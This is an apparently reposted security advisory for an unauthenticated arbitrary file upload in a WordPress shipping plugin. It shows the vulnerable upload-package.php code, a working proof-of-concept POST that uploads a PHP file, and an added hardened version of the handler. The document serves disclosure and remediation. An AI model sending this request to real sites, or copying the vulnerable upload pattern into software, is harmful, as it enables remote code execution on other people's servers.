WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
CVE: N/A
Category: CWE-434 (Unrestricted Upload of File with Dangerous Type)
Price: N/A
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2018-12-29
CPE: cpe:/a:wordpress:plugin:baggage_freight_shipping_australia:0.1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120236
Below is a copy:
Exploit Title : WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
Exploit Author : The Mechiavellian
Exploit Author Facebook :
Vendor Homepage || software link : https://wordpress.org/plugins/baggage-freight/
Version : 0.1.0
Unrestricted file upload by an unauthenticated user in the package-info upload handler: upload-package.php is reachable directly under wp-content/plugins/, performs no login, capability or nonce check, keeps the client-supplied filename (including a .php extension) and writes the file into a web-accessible directory, so any remote user can upload and then execute PHP code.
Vulnerable code in upload-package.php:
<?php
// No WordPress bootstrap, no authentication and no CSRF protection: anyone who
// can reach this file can POST to it.
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        // Only a time() prefix is added; the extension and the rest of the name
        // are attacker-controlled, so "file.php" is stored as executable PHP
        // under a web-served path.
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
    }
}
poc (the blank lines between headers and bodies, a placeholder file body and the closing boundary are added here to complete the truncated listing):
POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...

-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"

1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav

<?php phpinfo(); ?>
-----------------------------18311719029180117571501079851--
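The following is an added example of how the handler above would be hardened; it is not the plugin's own code and not part of the original advisory. It assumes the upload is routed through WordPress's admin-post.php (so WordPress is loaded and the user is authenticated before the handler runs) and uses assumed names for the action, the nonce field and the whitelist of package-info file types. It addresses each defect in the vulnerable snippet: missing authentication and authorisation, missing CSRF protection, no file-type restriction, and an attacker-controlled destination name.

```php
<?php
/*
 * Added example (not the plugin's code): hardened replacement for the upload
 * handler in upload-package.php. Instead of a PHP file reachable directly under
 * wp-content/plugins/, the handler is registered on the admin_post_ hook, so it
 * only runs inside WordPress for a logged-in user. The action name
 * "baggage_upload_package", the nonce field "baggage_nonce" and the allowed
 * file types are assumptions made for this example.
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Refuse direct requests to this file; only WordPress may include it.
}

// Whitelist of package-info file types (extension => MIME). Anything else,
// including .php and double extensions such as .php.csv, is rejected.
const BAGGAGE_ALLOWED_MIMES = array(
    'csv' => 'text/csv',
    'txt' => 'text/plain',
    'pdf' => 'application/pdf',
);

function baggage_handle_package_upload() {
    // 1. Authorisation: the original checked nothing. Require a capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF protection: the form must carry a valid nonce for this action.
    check_admin_referer( 'baggage_upload_package', 'baggage_nonce' );

    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_die( 'No file uploaded.', '', array( 'response' => 400 ) );
    }

    // 3. Type restriction: check the extension against the whitelist and let
    //    WordPress confirm the declared type against the content where it can.
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        BAGGAGE_ALLOWED_MIMES
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_die( 'File type not allowed.', '', array( 'response' => 415 ) );
    }

    // 4. Store through wp_handle_upload: the file goes to the uploads
    //    directory under a random name, not to a caller-chosen name inside
    //    the plugin directory. The 'mimes' override re-applies the whitelist.
    if ( ! function_exists( 'wp_handle_upload' ) ) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }
    $result = wp_handle_upload(
        $_FILES['file'],
        array(
            'test_form'                => false,
            'mimes'                    => BAGGAGE_ALLOWED_MIMES,
            // $ext already contains the leading dot and is the validated one.
            'unique_filename_callback' => function ( $dir, $name, $ext ) {
                return wp_generate_password( 16, false ) . $ext;
            },
        )
    );
    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ), '', array( 'response' => 400 ) );
    }

    wp_safe_redirect( add_query_arg( 'uploaded', '1', wp_get_referer() ) );
    exit;
}

// Only authenticated users reach admin_post_{action}; there is deliberately no
// admin_post_nopriv_ registration, so anonymous POSTs to
// admin-post.php?action=baggage_upload_package are not handled at all.
add_action( 'admin_post_baggage_upload_package', 'baggage_handle_package_upload' );
```

The form that submits to this handler must POST to admin-post.php with action=baggage_upload_package and include wp_nonce_field( 'baggage_upload_package', 'baggage_nonce' ); the original upload-package.php should be deleted rather than left reachable, since the ABSPATH guard only helps if it is included by WordPress.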